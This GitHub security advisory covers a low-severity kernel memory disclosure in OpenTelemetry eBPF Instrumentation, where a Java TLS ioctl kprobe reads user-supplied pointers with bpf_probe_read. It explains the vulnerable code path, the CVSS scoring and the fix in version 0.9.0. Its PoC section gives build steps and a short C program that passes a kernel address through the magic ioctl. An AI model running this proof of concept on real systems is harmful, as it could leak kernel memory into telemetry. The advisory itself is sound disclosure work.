Skip to content

OpenTelemetry eBPF Instrumentation: Java TLS ioctl kprobe allows kernel memory disclosure

Low severity GitHub Reviewed Published May 12, 2026 in open-telemetry/opentelemetry-ebpf-instrumentation • Updated Jun 9, 2026

Package

gomod go.opentelemetry.io/obi (Go)

Affected versions

< 0.9.0

Patched versions

0.9.0

Description

Summary

The Java TLS ioctl probe reads user-controlled ioctl pointers with bpf_probe_read instead of bpf_probe_read_user. An instrumented local process can therefore point OBI at kernel memory and cause that memory to be copied into telemetry.

Details

The vulnerable path is in bpf/generictracer/java_tls.c. The kprobe hooks do_vfs_ioctl, filters on fd == 0 and the Java TLS magic command, and then treats the third ioctl argument as a structured buffer. It reads fields from that pointer using bpf_probe_read, including:

  • the operation byte from arg
  • connection metadata from arg + 1
  • the payload length from arg + 1 + sizeof(connection_info_t)

If len > 0, it computes buf = arg + 1 + sizeof(connection_info_t) + sizeof(u32) and passes that pointer into handle_buf_with_connection.

The next stage, bpf/generictracer/k_tracer_defs.h, uses bpf_probe_read(args->small_buf, MIN_HTTP2_SIZE, (void *)args->u_buf); on the supplied pointer and tail-calls deeper protocol logic. The HTTP protocol path then reads from u_buf and emits the bytes through bpf_ringbuf_output in bpf/generictracer/protocol_http.h.

Because the ioctl pointer originates in user space, the probe should be using bpf_probe_read_user with strict length validation. Using bpf_probe_read instead makes it possible for an instrumented process to supply a kernel pointer and exfiltrate kernel-resident bytes into telemetry.

PoC

A complete lab reproduction requires:

  1. a vulnerable build of OBI with Java TLS instrumentation enabled
  2. a host capable of loading the BPF program
  3. a local process that issues the Java TLS magic ioctl with an attacker-controlled pointer

Suggested reproduction steps:

git checkout v0.0.0-rc.1+build
make build
sudo ./bin/obi

Then run a local helper that issues the matching ioctl command against fd=0 and supplies a crafted pointer.

// save as /tmp/ioctl_kernel_ptr.c
#include <stdio.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define JAVA_TLS_MAGIC 0x0b10b1

int main(void) {
  void *ptr = (void *)0xffff888000000000ULL;
  long rc = ioctl(0, JAVA_TLS_MAGIC, ptr);
  printf("ioctl rc=%ld\n", rc);
  return 0;
}

Compile and run:

cc -O2 -o /tmp/ioctl_kernel_ptr /tmp/ioctl_kernel_ptr.c
/tmp/ioctl_kernel_ptr

On a vulnerable system, if the supplied pointer references readable kernel memory and the bytes satisfy the expected Java TLS structure enough to pass the early checks, OBI can read from that address and emit the resulting bytes into telemetry. The remaining local prerequisite is a host session with sufficient BPF capability to load and inspect the probe; the compile side of the reproduction is already satisfied here.

Impact

This is a local kernel memory disclosure primitive reachable from unprivileged instrumented processes. It affects deployments that enable Java TLS support. Successful exploitation can expose kernel memory contents to the privileged OBI agent and then to downstream telemetry systems.

References

@MrAlias MrAlias published to open-telemetry/opentelemetry-ebpf-instrumentation May 12, 2026
Published to the GitHub Advisory Database May 18, 2026
Reviewed May 18, 2026
Published by the National Vulnerability Database Jun 2, 2026
Last updated Jun 9, 2026

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(3rd percentile)

Weaknesses

Buffer Under-read

The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer. Learn more on MITRE.

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

CVE ID

CVE-2026-45683

GHSA ID

GHSA-fjq3-ffvr-vm46

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.